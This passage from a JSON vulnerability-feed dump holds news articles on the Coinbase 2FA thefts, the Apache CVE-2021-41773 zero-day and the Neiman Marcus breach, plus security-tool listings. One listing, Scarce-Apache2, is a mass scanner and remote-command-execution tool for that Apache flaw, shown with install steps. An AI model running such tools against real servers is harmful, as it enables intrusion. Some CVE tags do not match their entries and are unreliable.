attacks.\n\nSubsequent events proved their point: In July 2020, an unauthorized third party [accessed Ledger\u2019s](<https://www.ledger.com/addressing-the-july-2020-e-commerce-and-marketing-data-breach>) e-commerce and marketing database, which held email addresses as well as contact and order details including first and last name, postal address, email address, and phone number.\n\nFollowing the July attack, researchers discovered [widespread campaigns](<https://threatpost.com/malicious-google-web-extensions-cryptowallet/154832/>) spreading malicious browser extensions that were abusing Google Ads and well-known cryptocurrency brands including Ledger to lure victims and eventually steal their cryptocurrency wallet credentials. Other wallets targeted in the campaign included Electrum, Exodus, Jaxx, KeepKey, MetaMask, MyEtherWallet and Trezor.\n\nAs well, the rise of cryptocurrency has made compromised crypto accounts hugely valuable in Dark Web marketplaces, according to the [2021 Dark Web price index](<https://threatpost.com/dark-web-markets-stolen-data/164626/>) from Privacy Affairs.\n\n\u201cDue to the skyrocketing prices of Bitcoin and other cryptocurrencies, hacked accounts may hold large sums of coin-based currency and cash, protected by relaxed security measures after the initial verification process,\u201d according to the report, which listed the average price for a hacked Coinbase-verified account to be $610.\n\n## SMS 2FA Authentication Flaw\n\nTL;DR: There are a lot of ways that the attackers could have gotten Coinbase users\u2019 personal details.\n\nBut beyond the personal information they needed to crack victims\u2019 accounts, the thieves needed more. For customers who use SMS texts for two-factor authentication (2FA), the unauthorized third parties had to leverage what Coinbase called a flaw in its SMS account recovery process, in order to receive an SMS 2FA token so as to gain access to accounts.\n\nCoinbase didn\u2019t go into detail about the flaw: It only said that as soon as it learned about the issue, it \u201cupdated our SMS Account Recovery protocols to prevent any further bypassing of that authentication process.\u201d\n\nIn a [guide on securing accounts](<https://help.coinbase.com/en/coinbase/privacy-and-security/data-privacy/how-can-i-make-my-account-more-secure>), Coinbase recommends enabling MFA authentication using security keys or Time-based One Time Passwords (TOTP) with an authenticator app. Verification via SMS text messages is listed as an option, but with caveats: This verification is, after all, subject to [SIM-swap](<https://threatpost.com/mobile-customer-service-sim-swap-fraud/151993/>) or phone-port attack.\n\nSIM swapping\u200b\u200b is a form of fraud that allows crooks to bypass SMS-based 2FA and crack online banking or other high-value accounts such as cryptocurrency wallets. In a typical scenario, an attacker would start by phishing personal and banking information \u2013 often via SMS phishing, which has the added benefit of confirming that a victim\u2019s cell phone number is an active line. Next, an attacker calls the victim\u2019s mobile carrier \u2013 easily discovered with an online search \u2013 and convinces a service rep to port the line to a different SIM card/device.\n\n## Can We Please Just Ditch SMS-Based 2FA?\n\nExperts agree that we should stick a fork in SMS-based 2FA: It\u2019s clearly toast.\n\nRoger Grimes, author of \u201cHacking Multifactor Authentication\u201d and data-driven defense evangelist, for [KnowBe4, ](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUavSzE-2FiwjSkZ-2BMZMLjTD68bBzltWsjOj4iPYBhQEjDkyRzZ_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74Jad0kl33W4of4UEvii1-2FaSF1UuT-2BEz-2F3w-2Fa4quMRgT-2BQRwS2UzU-2B80mrmRcZ7BOu57U-2BlcUbUsgPP5Wrdcp27qpLYZxzLJ8Qwfb3N2eINqk-2B5ALA-2BX5H1WrmgjAUxrSn8W0e1Z6v5ZnIV13lpn-2B50Ro1gC3Tlq6dmLQeuWBPT6iCljuZaA0Ro4dPQB024lIgxWmvsVLHVUCHy-2BYHA-2BMTirRBLwlLSZQSccA4CzRdeZ-2Fb9M-3D>) said that this has got to be at least the third or fourth time that Coinbase customers have been compromised. While all MFA solutions can be hacked multiple ways, SMS-based MFA are \u201camong the most hackable MFA solutions,\u201d he said.\n\nIt isn\u2019t exactly breaking news. In 2017, the [NIST Digital Identity Guidelines](<https://www.nist.gov/itl/applied-cybersecurity/tig/projects/special-publication-800-63>) said that SMS-based MFA was very weak and shouldn\u2019t be used to protect valuable data and content, going so far as to reserve the right to remove it as an allowed MFA solution completely in the future.\n\nIn spite of that, \u201cSMS-based MFA is probably the most used MFA solution on the internet today,\u201d Grimes said. He blames vendors who force users to rely on SMS-based MFA because that\u2019s what the vendor uses.\n\n\u201cAlmost all the users that do use SMS-based MFA do not know how easily it is hacked,\u201d Grimes contended, which is an issue with all MFA solutions. \u201cUsers are not told how each type can be still be hacked, abused and bypassed, sometimes easily so, and this leads to most users thinking they are being super secure because they are using MFA and far less hackable, when that is absolutely not the case.\u201d\n\nGrimes thinks that the MFA solution lies in making sure \u201cthat all stakeholders (e.g., management, buyers, implementers, sysadmins, users, etc.) understand what the potential weaknesses are for their particular type of MFA, and everyone is educated about possible attacks and how to avoid them.\u201d\n\nChris Clements, vice president of solutions architecture for Cerberus Sentinel, added that it\u2019s incumbent on cryptocurrency users to understand that they\u2019re constantly being targeted by cybercriminals attempting to rob them.\n\nAnd once those funds are gone, they\u2019re gone for good, Clements said. \u201cThe decentralized nature of most coins means that if criminals are successful in stealing them, there\u2019s very little chance you will be able to recover your losses,\u201d he said. \u201cAs such, it\u2019s important that users of cryptocurrency study up and implement appropriate opsec to protect themselves from the inevitable attacks, including ensuring that any computing devices or smartphones are hardened and up to date with the latest security patches and implementing strong unique passwords as well as multi-factor authentication controls such as TOTP or hardware security keys like FIDO. Finally, cold wallets kept completely offline are useful for limiting much easier online attack vectors.\u201d\n\n## Coinbase Makes Good on the Money\n\nCoinbase said that it will deposit funds back into victims\u2019 accounts, \u201cequal to the value of the currency improperly removed from your account at the time of the incident.\u201d Some customers have already been reimbursed, the exchange said, promising that customers will receive \u201cthe full value of what you lost.\u201d\n\nThe exchange is also providing free credit monitoring to affected customers.\n\nCoinbase encouraged users of SMS-based authentication to drop it and to instead use stronger MFA, including TOTP or a hardware security key. It also strongly encouraged victims to change their Coinbase account password to a new, strong and unique password: one that\u2019s not used on any other site.\n\nThe same goes for email accounts: \u201cBecause the third parties needed access to your personal email account as part of this incident, we strongly encourage you to change your password in the same way for your email account and for any other online accounts where you use a similar password,\u201d the exchange advised.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-10-01T20:08:23", "type": "threatpost", "title": "MFA Glitch Leads to 6K+ Coinbase Customers Getting Robbed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-01T20:08:23", "id": "THREATPOST:8325094507099F4F089C61EF2997445C", "href": "https://threatpost.com/mfa-glitch-coinbase-customers-robbery/175290/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-10-08T11:24:43", "description": "Apache Software has quickly issued a fix for a zero-day security bug in the Apache HTTP Server, which was first reported to the project last week. The vulnerability is under active exploitation in the wild, it said, and could allow attackers to access sensitive information.\n\nAccording to a [security advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>) issued on Monday, the issue (CVE-2021-41773) could allow path traversal and subsequent file disclosure. Path traversal issues allow unauthorized people to access files on a web server, by tricking either the web server or the web application running on it into returning files that exist outside of the web root folder.\n\nThe vulnerability is rated Important, with a CVSS score of 5.1 out of 10.\n\nIn this case, the issue affects only version 2.4.49 of Apache\u2019s open-source web server, which offers cross-platform operability with all modern operating systems, including UNIX and Windows.\n\n\u201cA flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49,\u201d according to the advisory. \u201cAn attacker could use a path-traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by \u2018require all denied,\u2019 these requests can succeed.\u201d\n\nThe bug could also expose the source of interpreted files like CGI scripts, the advisory added, which which may contain sensitive information that attackers can exploit for further attacks.\n\nResearchers such as the offensive team at Positive Technologies quickly created proof-of-concept exploits verifying the attack path, so expect more attack avenues to be availably publicly soon:\n\nhttps://twitter.com/ptswarm/status/1445376079548624899\n\nTenable [noted that](<https://www.tenable.com/blog/cve-2021-41773-path-traversal-zero-day-in-apache-http-server-exploited>) a Shodan search on Tuesday turned up about 112,000 Apache HTTP Servers that are confirmed to be running the vulnerable version, including 43,000 or so in the U.S.\n\n\u201cHowever, other vulnerable web servers might be configured to not display version information,\u201d according to the firm\u2019s blog.\n\nUsers can protect themselves by upgrading to version 2.4.50. It should be noted that \u201crequire all denied\u201d (which denies access to all requests) is the default for protecting documents outside of the web root, [researchers have reported](<https://twitter.com/damian_89_/status/1445388530130227208>) \u2013 which mitigates the issue.\n\nApache credited Ash Daulton and the cPanel Security Team for reporting the bug.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-10-05T20:01:27", "type": "threatpost", "title": "Apache Web Server Zero-Day Actively Exploited, Exposes Sensitive Data", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-05T20:01:27", "id": "THREATPOST:641CEDBD77D5E4711F6E56353D7B5E33", "href": "https://threatpost.com/apache-web-server-zero-day-sensitive-data/175340/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-10-05T20:07:15", "description": "Dallas-based Neiman Marcus Group is known worldwide as the go-to luxury retailer for the well-heeled. But their reputation for impeccable quality just took a big hit with revelations that the company was breached by an attacker back in May 2020.\n\nIt took 17 months for the retailer to notice.\n\nJust this week, Neiman Marcus [acknowledged the compromise](<https://www.neimanmarcusgroup.com/2021-09-30-Neiman-Marcus-Confirms-Unauthorized-Access-to-Customer-Online-Accounts>), which included personal customer information like names, contact information, payment card information (without CVV codes), gift card numbers (without PINs), usernames, passwords and even security questions associated with online Neiman Marcus accounts.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nIn total, Neiman Marcus, which also controls the brands Bergdorf Goodman, Neiman Marcus Last Call and Horchow, said 3.1 million cards were affected. But more than 85 percent of those had already expired, the company said.\n\n\u201cNo active Neiman Marcus-branded credit cards were impacted,\u201d the company\u2019s statement said. \u201cAt this time, the Company has no evidence that Bergdorf Goodman or Horchow online customer accounts were affected.\u201d\n\nNeiman Marcus is working with law enforcement and cybersecurity company Mandiant to get more information about the [retailer\u2019s compromise](<https://threatpost.com/protect-account-takeover-cyberattacks/175090/>), the company said.\n\n\u201cAt Neiman Marcus Group, customers are our top priority,\u201d Geoffroy van Raemdonck, the company\u2019s CEO, said in the announcement of the breach. \u201cWe are working hard to support our customers and answer questions about their online accounts. We will continue to take actions to enhance our system security and safeguard information.\u201d\n\n## **Undetected NMG Breach \u2018Dangerous\u2019 for Customers **\n\nBut security experts say it\u2019s too late for Neiman Marcus to protect its customers and that the delay in detection of the unauthorized access makes the situation more dire.\n\n\u201cThe breach occurred before Neiman Marcus filed for bankruptcy in September 2020, which could have caused a delay in identification,\u201d said Quentin Rhoads, director of professional services at security firm CriticalStart. \u201cFrom a security perspective it is very dangerous for a company to go this long without detecting and responding to a breach. More damage could have been done that has yet [to be] discovered.\u201d\n\nHe said it\u2019s likely the attackers sold off the access to NMG\u2019s systems to someone else for later abuse.\n\n\u201cEven though most of the credit cards and gift cards stolen don\u2019t contain data like pins and CVVs, and are probably expired, the theft of usernames and passwords is concerning,\u201d Rhoads added. \u201cThis data more than likely would be sold to other attackers who can use this for crimes such as [identity] theft in conjunction with the other personal information stolen.\u201d\n\nHe also said it\u2019s going to be hard to find any firm evidence of the breach, since so much time has passed since the initial compromise.\n\n\u201cMore than likely, critical evidence is no longer present in their systems,\u201d Rhoads said. \u201cThey could easily be unable to identify the initial point of the breach, what other areas did the attackers get access to, what the attackers did outside of stealing data. All of these points are critical for an organization to understand to appropriately notify [affected] parties, identify pathways to prevent this in the future, and [to provide] critical evidence to law enforcement to further criminal investigations.\u201d\n\n## **Lack of Security at Many Orgs Is \u2018Staggering\u2019**\n\nChris Clements, VP of solutions architecture at Cerberus Sentinel, was blunter about Neiman Marcus\u2019 security blunder.\n\n\u201cThe lack of both prevention and detection capabilities at many organizations is simply staggering,\u201d Clements said. \u201cI try as much as possible to shy away from victim blaming, but in many circumstances, organizations have been grossly negligent in securing customer data.\u201d\n\nClements added that in many breaches, it\u2019s very easy for an attacker to get their hands on customer data.\n\n\u201cDespite the press releases that almost never fail to describe the attackers or attack methods as \u2018highly sophisticated,\u2019 the reality is that most breaches aren\u2019t some \u2018super cyber heist plot\u2019 out of a bad movie, but rather akin so some guy walking in the front door and wheeling out a file cabinet and no one is around to notice.\u201d\n\nJustin Fier, a director with Darktrace, said Neiman Marcus\u2019s [security team](<https://threatpost.com/protect-account-takeover-cyberattacks/175090/>) should assume the attacker has been lurking in its systems since May 2020. He adds that it\u2019s the responsibility of Neiman Marcus to adopt a more modern security strategy.\n\n\u201cToday, the most cyber mature retailers are relying on artificial intelligence for everything from credit fraud to supply logistics and, of course, to continually monitor their risk across globally distributed networks and complex digital infrastructures,\u201d Fier said. \u201cAs retailers like Neiman Marcus adapt to a more virtual world and embrace innovations to support remote shopping (like its recently announced virtual sneaker showroom) we should expect attacks on the industry to increase. These innovations open more avenues for attackers to poke to access the private data of consumers. Businesses have a responsibility to ensure their consumers\u2019 personal data is protected with the best defensive technology available to them.\u201d\n\nFor now, Neiman Marcus is asking customers to reset their passwords and has set up a call center for those concerned about their information being compromised.\n\nNick Sanna, CEO of RiskLens, said retailers are under both ethical and regulatory obligations to protect customer data.\n\n\u201cThey have an obligation to keep this sensitive customer data safe and out of the hands of the wrong people, obligations that are both ethical and regulatory in nature,\u201d Sanna said. \u201cThe outcome of not doing this is exactly what Neiman Marcus Group is now facing.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-10-01T17:50:42", "type": "threatpost", "title": "3.1M Neiman Marcus Customer Card Details Breached", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-01T17:50:42", "id": "THREATPOST:49DCD8325E10F7898739335BD99AE94B", "href": "https://threatpost.com/neiman-marcus-customers-breach/175284/", "cvss": {"score": 0.0, "vector": "NONE"}}], "wallarmlab": [{"lastseen": "2021-12-07T18:39:22", "description": "Attacks against known vulnerabilities are one of the most common security risks. Have you seen an updated OWASP Top-10? A risk that used to be **A09 Using Components with Known Vulnerabilities** is now titled **A06:2021-Vulnerable and Outdated Components**. This category moved up to #06 from #9 in 2017. We highlighted this in our [OWASP Top 10 2021 proposal](<https://lab.wallarm.com/owasp-top-10-2021-proposal-based-on-a-statistical-data/>) that we published earlier this year.\n\nWe all know: _patch management is hard. _For many reasons: backward compatibility, code refactoring overheads, testing, legacy code. Patches and updates are just hard to apply on time. A kind of challenge where [WAFs](<https://www.wallarm.com/product/cloud-waf>) and [API Security Platform](<https://www.wallarm.com/product/cloud-native-api-security>) products can be a perfect solution with their attack detection capabilities, virtual patches, and proactive vulnerability detection capabilities.\n\n## Known attacks vs. unknown attacks\n\nWallarm introduces the new feature to highlight known attacks:\n\n 1. Attacks against known vulnerabilities and CVEs that are associated with them.\n 2. Typical payloads and attack vectors that our team already saw in the wild.\n\nBy using new filters, you can filter out all the known attacks for your analysis that drastically decreases the number of events for analysis. You can exclude events that are more likely to be mass scanning and random testing and instead focus on some unique events and unusual attacks. It\u2019s also a great way to identify any potential false positives as it\u2019s highly unlikely that the output for the known attacks would have any of them. Just use this attack query to exclude all the typical/known attacks and get only unusual events:\n\n * attacks today !known\n\nFor example, one of our customers had ~1K attacks for the last 7 days -- but only 12 events that were not relying on the typical tooling/CVEs/scanning. A huge difference in the amount of data to analyze.\n\nOr another use case. Suppose you learn about some new CVE that is relevant to your tech stack. In that case, you can also instantly run a search query and check if there have been any exploitation attempts against your applications.\n\nNew feature is already deployed for the whole customer base. No updates and additional configuration are required. \n\n## See it in action\n\nThese are some examples of usage.\n\n**Chose between searching of all events, known or unknown attacks**\n\n * All attacks - see all the results\n * Known attacks (CVE) - attacks that are known to target CVEs or has typical payloads\n * Other attacks - not known attacks to keep 0days and potentially false positives\n\n\n**Search attacks by CVE **\n\nYou can search for the attacks that use some particular CVE:\n\n * attacks today known CVE-2021-41773\n\nOr if you like, find all the events that are related to any known CVE by using _known cve_ keywords:\n\n * attacks today known cve\nAttack details now includes CVE tags on the left side\n\n## New CVEs\n\nThe Wallarm team has added more than 1500 recent CVEs to the list and keeps updating the database every day. One of the objectives is that the team has to analyze all the new CVEs and introduce filters as soon as the public data on the CVE is published. Wallarm team also enumerates vulnerabilities backward by analysis of real attacks data to add filters for more known attacks and payloads seen in the wild.\n\nThe post [Wallarm starts to highlight CVE to address OWASP Top-10 A6 Vulnerable and Outdated Components](<https://lab.wallarm.com/wallarm-starts-to-highlight-cve-to-address-owasp-top-10-a6-vulnerable-and-outdated-components/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-15T23:13:35", "type": "wallarmlab", "title": "Wallarm starts to highlight CVE to address OWASP Top-10 A6 Vulnerable and Outdated Components", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-15T23:13:35", "id": "WALLARMLAB:6D3FED0879553B4C47AD26ED1DEB5AEB", "href": "https://lab.wallarm.com/wallarm-starts-to-highlight-cve-to-address-owasp-top-10-a6-vulnerable-and-outdated-components/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "kitploit": [{"lastseen": "2021-11-04T00:41:18", "description": "Inventus is a spider designed to find subdomains of a specific domain by [ crawling ](<https://www.kitploit.com/search/label/Crawling>) it and any subdomains it discovers. It's a [ Scrapy ](<https://scrapy.org/>) spider, meaning it's easily modified and extendable to your needs. \n\n \n** Demo ** \n\n\n[  ](<https://asciinema.org/a/PGIeEpEwZTUdgxrolBpCjljHL>)\n\n \n** Requirements ** \n\n\n * Linux -- I haven't tested this on Windows. \n * Python 2.7 or Python 3.3+ \n * Scrapy 1.4.0 or above. \n \n** Installation ** \nInventus requires Scrapy to be installed before it can be run. Firstly, clone the repo and enter it. \n\n \n \n $ git clone https://github.com/nmalcolm/Inventus\n $ cd Inventus\n\nNow install the required dependencies using ` pip ` . \n\n \n \n $ pip install -r requirements.txt\n\nAssuming the installation succeeded, Inventus should be ready to use. \n \n** Usage ** \nThe most basic usage of Inventus is as follows: \n\n \n \n $ cd Inventus\n $ scrapy crawl inventus -a domain=facebook.com\n\nThis tells Scrapy which spider to use (\"inventus\" in this case), and passes the domain to the spider. Any subdomains found will be sent to ` STDOUT ` . \nThe other custom parameter is ` subdomain_limit ` . This sets a max limit of subdomains to [ discover ](<https://www.kitploit.com/search/label/Discover>) before quitting. The default value is 10000, but isn't a hard limit. \n\n \n \n $ scrapy crawl inventus -a domain=facebook.com -a subdomain_limit=100\n\n \n** Exporting ** \nExporting data can be done in multiple ways. The easiest way is redirecting ` STDOUT ` to a file. \n\n \n \n $ scrapy crawl inventus -a domain=facebook.com > facebook.txt\n\nScrapy has a built-in feature which allows you to export items into various formats, including CSV, JSON, and XML. Currently only subdomains will be exported, however this may change in the future. \n\n \n \n $ scrapy crawl inventus -a domain=facebook.com -t csv -o Facebook.csv\n\n \n** Configuration ** \nConfigurations can be made to how Inventus behaves. By default Inventus will ignore robots.txt, has a 30 second timeout, caches crawl data for 24 hours, has a crawl depth of 5, and uses Scrapy's AutoThrottle extension. These and more can all be changed by editing the ` inventus_spider/settings.py ` file. Scrapy's settings are [ well documented ](<https://doc.scrapy.org/en/latest/topics/settings.html#aws-access-key-id>) too. \n \n \n\n\n** [ Download Inventus ](<https://github.com/nmalcolm/Inventus>) **\n", "cvss3": {}, "published": "2017-09-18T14:30:15", "type": "kitploit", "title": "Inventus - A Spider Designed To Find Subdomains Of A Specific Domain By Crawling", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2017-09-18T14:30:15", "id": "KITPLOIT:3027120689321178260", "href": "http://www.kitploit.com/2017/09/inventus-spider-designed-to-find.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-05T14:37:59", "description": "[  ](<https://4.bp.blogspot.com/--9hNXCN9hCQ/WbnEOt8NWBI/AAAAAAAAI4E/JWACq2Oe7J4jlpruoRhVFfXJYl7AT1W-gCLcBGAs/s1600/binary-skull.jpg>)\n\n \n\n\nThe Pharos static binary [ analysis framework ](<https://www.kitploit.com/search/label/Analysis%20Framework>) is a project of the Software Engineering Institute at Carnegie Mellon University. The framework is designed to facilitate the automated [ analysis ](<https://www.kitploit.com/search/label/Analysis>) of binary programs. It uses the ROSE compiler infrastructure developed by Lawrence Livermore National Laboratory for disassembly, control flow analysis, instruction semantics, and more. \n\n \n\n\nThe current distribution in is a substantial update to the previous version, and is part of an ongoing process to release more of the framework and tools publicly. This release has a more generous BSD [ license ](<https://github.com/cmu-sei/pharos/blob/master/LICENSE.md>) than the previous release. Carnegie Mellon University retains the [ copyright ](<https://github.com/cmu-sei/pharos/blob/master/COPYRIGHT.md>) . \n\n \n\n\nThe Pharos framework is a research project, and the code is undergoing active development. No warranties of fitness for any purpose are provided. While this release provides build instructions, unit tests, and some documentation, much work remains to be done. We've tested a few select build configurations, but have not actively tested the portability of the source code. See the [ installation instructions ](<https://github.com/cmu-sei/pharos/blob/master/INSTALL.md>) for more details. \n\n \n\n\n** Pharos Static Binary Analysis Tools **\n\n \n\n\n** APIAnalyzer **\n\nApAnalyzer is a tool for finding sequences of API calls with the specified data and control relationships. This capability is intended to be used to detect common operating system interaction paradigms like opening a file, writing to it, and the closing it. \n\n \n\n\n** OOAnalyzer **\n\nOOAnalyzer is a tool for the [ analysis ](<https://www.kitploit.com/search/label/Analysis>) and recovery of object oriented constructs. This tool was the subject of a paper titled \"Recovering C++ Objects From Binaries Using Inter-Procedural Data-Flow Analysis\" which was published at the ACM SIGPLAN on Program Protection and Reverse Engineering Workshop in 2014. The tool identifies object members and methods by tracking object pointers between functions in the program. This tool was previously named \"Objdigger\" and is the process of being renamed OOAnalyzer as part of a substantial redesign using Prolog rules to recover the object attributes. \n\n \n\n\n** CallAnalyzer **\n\nCallanalyzer is a tool for [ reporting ](<https://www.kitploit.com/search/label/Reporting>) the static parameters to API calls in a binary program. It is largely a demonstration of our current calling convention, parameter analysis, and type detection capabilities, although it also provides a useful [ analysis ](<https://www.kitploit.com/search/label/Analysis>) of the code in a program. \n\n \n\n\n** FN2Yara **\n\nFN2Yara is a tool to generate YARA signatures for matching functions in an executable program. Programs that share significant numbers of functions are likely to have behavior in common. \n\n \n\n\n** FN2Hash **\n\nFN2Hash is a tool for generating a variety of hashes and other descriptive properties of functions in an executable program. Like FN2Yara it can be used to support binary similarity analysis, or provide features for [ machine learning ](<https://www.kitploit.com/search/label/Machine%20Learning>) algorithm. \n\n \n\n\n** DumpMASM **\n\nDumpMASM is a tool for dumping disassembly listings from an executable using the Pharos framework in the same style as the other tools. It has not been actively maintained, and you should consider using ROSE's standard recursive disassembler instead. \n\n \n \n\n\n** [ Download Pharos ](<https://github.com/cmu-sei/pharos>) **\n", "cvss3": {}, "published": "2018-08-26T17:06:59", "type": "kitploit", "title": "Pharos - Static Binary Analysis Framework", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2018-08-26T17:06:59", "id": "KITPLOIT:9205213728263868656", "href": "http://www.kitploit.com/2017/09/pharos-static-binary-analysis-framework.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-07T12:01:32", "description": "[](<https://blogger.googleusercontent.com/img/a/AVvXsEhRWcdl04xGOBLlM_g9DzCMsFGGCPy3N36bwNXfArCm8SpaUroy9Mz1Hbu3C1TRfKxBxybgzs-SqbGIEGrRNmRVNsBKR6Q-xz_FidYUIKelwx0WxxGHbUKwuaAxqxbEllP6n3ltZ9GEJ5YooEJjV_t9qXahy8rxhXsfZdsm13xnvEsqubv2pKrmpz_ZTQ=s726>)\n\n \n\n\nThis tool can [scan](<https://www.kitploit.com/search/label/Scan> \"scan\" ) websites with CVE-2021-41773 [Vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"Vulnerability\" ) that are affecting Apache2 Webserver, ScaRCE can run too for executing [Remote](<https://www.kitploit.com/search/label/Remote> \"Remote\" ) Command Injections at the webservers that found from the [scanning](<https://www.kitploit.com/search/label/Scanning> \"scanning\" ) method (Only if the **MOD_CGI** is Enabled at the targeted webserver). This tool works with the provided Single target or Mass Target from a file list. Only use this tool for `Bug Hunting`/ `Pentesting Purposes`.\n\n \n\n\n[](<https://blogger.googleusercontent.com/img/a/AVvXsEhcRO_Dx6ScPy-zCqhbv9ZsB2Y5EC8Fo6FWrpWx7sC6H81feJvY1pb5uzirFi7KR2oxTamEqKPWFhxXCSe1KxDJRM7o_OPtZ0E_opEOIPdRH5-K7CLTLOPqYl8AVpIYyPIVzHN2y0b-oX3qT8PJHymUb-zEDweKomCW-IrxvpHMUWYDhxdLHAhrbYyhRg=s641>)\n\n \n\n\n[](<https://blogger.googleusercontent.com/img/a/AVvXsEibLpxQqYUk-e42cAQqZ79qpvIPld94BKnn9nRm5UKHJHHzCrxMmSyMaEe6e5oqhtxC1eNWqnS_fVBYSzclUT22R3QBDK-dVg6xZmz_UNeVjr8xPea5WH1k8ewTWW1cOFovZuFQKAI3eMTGsaEzRgRzc5Y-Zps4nILNgDM7M8lXAq_dR8u-VQ14vRnw4w=s643>)\n\n \n\n\n[](<https://blogger.googleusercontent.com/img/a/AVvXsEgITNTPLGq-_s81ClmEAdJnpep5lS-i7ge88cEABBssuGeWiMh_sGZKgZdfBjaSBtF28FxHMTgOgdYMX41-cRlbCm9fsupSbxh9IpupmTp8sfqoEJrktxbd5YYiIb9wjULUrKMQ24wVyYOMXEdo5voYEA9DjZ10AtWjOsnZGvMJj5h9sgKsomPSldh1xw=s726>)\n\n \n\n\n**Installation** \n\n \n \n - git clone https://github.com/HightechSec/scarce-apache2 \n - cd scarce-apache2 \n - bash scarce.sh \n \n\nor you can install in your system like this\n \n \n - git clone https://github.com/HightechSec/scarce-apache2 \n - cd scarce-apache2 \n - sudo cp scarce.sh /usr/bin/scarce && sudo chmod +x /usr/bin/scarce \n - $ scarce \n \n\n \n**Usage** \n\n\n * Menu's \n * Menu `1` is for scanning [LFI Vulnerability](<https://www.kitploit.com/search/label/LFI%20Vulnerability> \"LFI Vulnerability\" ) from a provided file that contains the `list of the target url` or a provided `single target url`.\n * Menu `2` is for scanning RCE Vulnerability from a provided file that contains the `list of the target url` or a provided `single target url`.\n * Menu `3` is for Executing RCE from a provided `single target url`. This will work for the `Maybe Vuln` Results or sometimes with a `500 Error Response`.\n * URL Format \n * Use `http://` like `http://example.com` or `https://` like `https://example.com` for the url formatting at Single Target usages\n * For Url or IP that has been provided from a `List`, **Don't Use** the URL Formatting like eg: \n * <https://target.com>\n * [http://hackerone.com](<https://hackerone.com> \"http://hackerone.com\" )\n * <https://bugcrowd.com>\n \n**Requirements** \n\n\n * curl\n * bash\n * git\n \n**Credits** \n\n\nThanks to:\n\n * [CVE-2021-41773 Reproduced](<https://twitter.com/ptswarm/status/1445376079548624899> \"CVE-2021-41773 Reproduced\" ) by [@ptswarm](<https://twitter.com/ptswarm> \"@ptswarm\" )\n * [Executing RCE in CVE-2021-41773](<https://twitter.com/hackerfantastic/status/1445531829985968137> \"Executing RCE in CVE-2021-41773\" ) by [@hackerfantastic](<https://twitter.com/hackerfantastic> \"@hackerfantastic\" )\n * [Removing 5xx Error when Running RCE](<https://twitter.com/lukejahnke/status/1445560511270064138> \"Removing 5xx Error when Running RCE\" ) by [@lukejahnke](<https://twitter.com/lukejahnke> \"@lukejahnke\" )\n \n \n\n\n**[Download Scarce-Apache2](<https://github.com/HightechSec/scarce-apache2> \"Download Scarce-Apache2\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-29T20:30:00", "type": "kitploit", "title": "Scarce-Apache2 - A Framework For Bug Hunting Or Pentesting Targeting Websites That Have CVE-2021-41773 Vulnerability In Public", "bulletinFamily": 